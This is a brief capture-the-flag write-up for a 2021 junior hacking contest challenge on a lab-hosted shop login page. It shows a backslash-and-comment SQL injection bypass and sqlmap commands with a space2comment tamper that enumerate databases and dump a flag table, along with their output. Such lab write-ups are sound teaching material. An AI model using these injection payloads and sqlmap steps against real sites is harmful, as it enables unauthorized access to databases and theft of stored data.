Need to read:

Example: JUNIOR HACKING TALENT 2021 - Cửa hàng đồ chơi Quận 4

Bypass Payload

select username from users where username='\' and password='OR/**/1=1#'

Final Payload

# sqlmap -u http://shop.kid.cyberjutsu-lab.tech/login.php --data "username=\&password=" -p password --string="Doraemon" --suffix="#" --tamper=space2comment.py --dbs
...
available databases [2]:
[*] information_schema
[*] myDB
...
# sqlmap -u http://shop.kid.cyberjutsu-lab.tech/login.php --data "username=\&password=" -p password --string="Doraemon" --suffix="#" --tamper=space2comment.py -D myDB --tables
...
[7 tables]
+---------------+
| authors       |
| flag_304ad593 |
| posts         |
| roles         |
| user_post     |
| user_role     |
| users         |
+---------------+
...
# sqlmap -u http://shop.kid.cyberjutsu-lab.tech/login.php --data "username=\&password=" -p password --string="Doraemon" --suffix="#" --tamper=space2comment.py -D myDB -T flag_304ad593 --dump
...
[1 entry]
+-------------------------------------+
| flag_3e53dc                         |
+-------------------------------------+
| CTF{pleAs3_doNt_r3invent_th3_whe3L} |
+-------------------------------------+
...